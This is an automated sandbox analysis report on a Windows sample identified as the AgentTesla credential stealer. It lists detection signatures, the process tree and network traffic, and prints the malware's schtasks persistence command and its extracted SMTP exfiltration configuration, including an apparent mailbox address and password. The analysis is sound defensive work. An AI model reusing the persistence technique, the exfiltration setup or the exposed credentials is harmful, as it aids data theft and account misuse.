Loading ...

Play interactive tourEdit tour

Analysis Report 4019223246.exe

Overview

General Information

Sample Name:4019223246.exe
Analysis ID:358326
MD5:87e6882bcebf4823afb4303aac3628b1
SHA1:fa6df79dd667fcbb97c6ffbf947ee356512b292d
SHA256:369d92b64ee7b40f1679b98499e6d2b3470f9d477a8c35256508ae5715516194
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM_3
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • 4019223246.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\4019223246.exe' MD5: 87E6882BCEBF4823AFB4303AAC3628B1)
    • schtasks.exe (PID: 5708 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 4019223246.exe (PID: 6104 cmdline: C:\Users\user\Desktop\4019223246.exe MD5: 87E6882BCEBF4823AFB4303AAC3628B1)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "FTP Info": "systems@krenterprisesindia.comparida@1971@us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000004.00000002.914172803.0000000003E21000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.914560852.0000000004FE0000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.4019223246.exe.25e301e.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.4019223246.exe.3e23258.8.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                4.2.4019223246.exe.3e24140.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.4019223246.exe.25e2136.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    4.3.4019223246.exe.be4648.0.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 15 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Scheduled temp file as task from temp locationShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\4019223246.exe' , ParentImage: C:\Users\user\Desktop\4019223246.exe, ParentProcessId: 7056, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp', ProcessId: 5708

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 4.2.4019223246.exe.29f0ee8.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "FTP Info": "systems@krenterprisesindia.comparida@1971@us2.smtp.mailhostbox.com"}
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: 4019223246.exeJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Uses 32bit PE filesShow sources
                      Source: 4019223246.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Uses new MSVCR DllsShow sources
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                      Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                      Source: 4019223246.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: _.pdb source: 4019223246.exe, 00000004.00000003.657876207.0000000000C2F000.00000004.00000001.sdmp
                      Source: global trafficTCP traffic: 192.168.2.4:49767 -> 208.91.198.143:587
                      Source: global trafficTCP traffic: 192.168.2.4:49769 -> 208.91.199.224:587
                      Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                      Source: Joe Sandbox ViewIP Address: 208.91.199.224 208.91.199.224
                      Source: global trafficTCP traffic: 192.168.2.4:49767 -> 208.91.198.143:587
                      Source: global trafficTCP traffic: 192.168.2.4:49769 -> 208.91.199.224:587
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_026BB0B2 recv,4_2_026BB0B2
                      Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com
                      Source: 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: http://qpQMsG.com
                      Source: 4019223246.exe, 00000001.00000002.658704693.0000000002C41000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 4019223246.exe, 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmpString found in binary or memory: http://wg3NmRd1lkGGL4Op.org
                      Source: 4019223246.exe, 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmpString found in binary or memory: http://wg3NmRd1lkGGL4Op.orghb
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                      Source: 4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: C:\Users\user\Desktop\4019223246.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary:

                      barindex
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_026BB9BA NtQuerySystemInformation,4_2_026BB9BA
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_026BB9A8 NtQuerySystemInformation,4_2_026BB9A8
                      Source: C:\Users\user\Desktop\4019223246.exeFile created: C:\Windows\assembly\Desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 1_2_012FCF781_2_012FCF78
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 1_2_012F97541_2_012F9754
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 1_2_012F9F801_2_012F9F80
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00406C504_2_00406C50
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_004028604_2_00402860
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_0041A47E4_2_0041A47E
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00408C104_2_00408C10
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00418C8C4_2_00418C8C
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_004016504_2_00401650
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_004182044_2_00418204
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00402ED04_2_00402ED0
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00402B404_2_00402B40
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_004187484_2_00418748
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_004073504_2_00407350
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00402F394_2_00402F39
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_0040DBD14_2_0040DBD1
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00407BEF4_2_00407BEF
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_004193844_2_00419384
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_026C8F4B4_2_026C8F4B
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: String function: 0040E198 appears 42 times
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs 4019223246.exe
                      Source: 4019223246.exe, 00000001.00000002.662251646.0000000005EF6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameObjectIDGenerator.exe< vs 4019223246.exe
                      Source: 4019223246.exe, 00000001.00000002.661981197.0000000005E70000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs 4019223246.exe
                      Source: 4019223246.exe, 00000001.00000002.662685824.0000000006720000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 4019223246.exe
                      Source: 4019223246.exe, 00000001.00000002.662685824.0000000006720000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 4019223246.exe
                      Source: 4019223246.exe, 00000001.00000002.662459335.0000000006620000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 4019223246.exe
                      Source: 4019223246.exe, 00000004.00000003.657876207.0000000000C2F000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs 4019223246.exe
                      Source: 4019223246.exe, 00000004.00000000.656009800.000000000054E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameObjectIDGenerator.exe< vs 4019223246.exe
                      Source: 4019223246.exe, 00000004.00000002.914172803.0000000003E21000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVYolEChnIaesWIMZgVfbCHvjTeMwVa.exe4 vs 4019223246.exe
                      Source: 4019223246.exe, 00000004.00000002.914766360.00000000051B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 4019223246.exe
                      Source: 4019223246.exeBinary or memory string: OriginalFilenameObjectIDGenerator.exe< vs 4019223246.exe
                      Source: 4019223246.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@2/2
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_026BA9DA AdjustTokenPrivileges,4_2_026BA9DA
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_026BA9A3 AdjustTokenPrivileges,4_2_026BA9A3
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401980
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401980
                      Source: C:\Users\user\Desktop\4019223246.exeFile created: C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_01
                      Source: C:\Users\user\Desktop\4019223246.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Users\user\Desktop\4019223246.exeFile created: C:\Users\user\AppData\Local\Temp\tmp35E.tmpJump to behavior
                      Source: 4019223246.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\4019223246.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\4019223246.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\4019223246.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\4019223246.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                      Source: 4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                      Source: C:\Users\user\Desktop\4019223246.exeFile read: C:\Users\user\Desktop\4019223246.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\4019223246.exe 'C:\Users\user\Desktop\4019223246.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp'
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\Desktop\4019223246.exe C:\Users\user\Desktop\4019223246.exe
                      Source: C:\Users\user\Desktop\4019223246.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp'Jump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess created: C:\Users\user\Desktop\4019223246.exe C:\Users\user\Desktop\4019223246.exeJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeFile written: C:\Windows\assembly\Desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: 4019223246.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: C:\Users\user\Desktop\4019223246.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                      Source: 4019223246.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: _.pdb source: 4019223246.exe, 00000004.00000003.657876207.0000000000C2F000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,4_2_00401980
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 1_2_00858D0C push es; iretd 1_2_00858F8B
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_0041C40C push cs; iretd 4_2_0041C4E2
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00423149 push eax; ret 4_2_00423179
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_0041C50E push cs; iretd 4_2_0041C4E2
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_004231C8 push eax; ret 4_2_00423179
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_0040E1DD push ecx; ret 4_2_0040E1F0
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_004211B8 push ebx; retf 4_2_004211B9
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_0041C6BE push ebx; ret 4_2_0041C6BF
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_00468D0C push es; iretd 4_2_00468F8B
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_026C9974 push ebp; iretd 4_2_026C9975
                      Source: C:\Users\user\Desktop\4019223246.exeCode function: 4_2_026C2C60 push edi; ret 4_2_026C2C76
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.13411382713
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.13411382713
                      Source: C:\Users\user\Desktop\4019223246.exeFile created: C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp'
                      Source: C:\Users\user\Desktop\4019223246.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\4019223246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
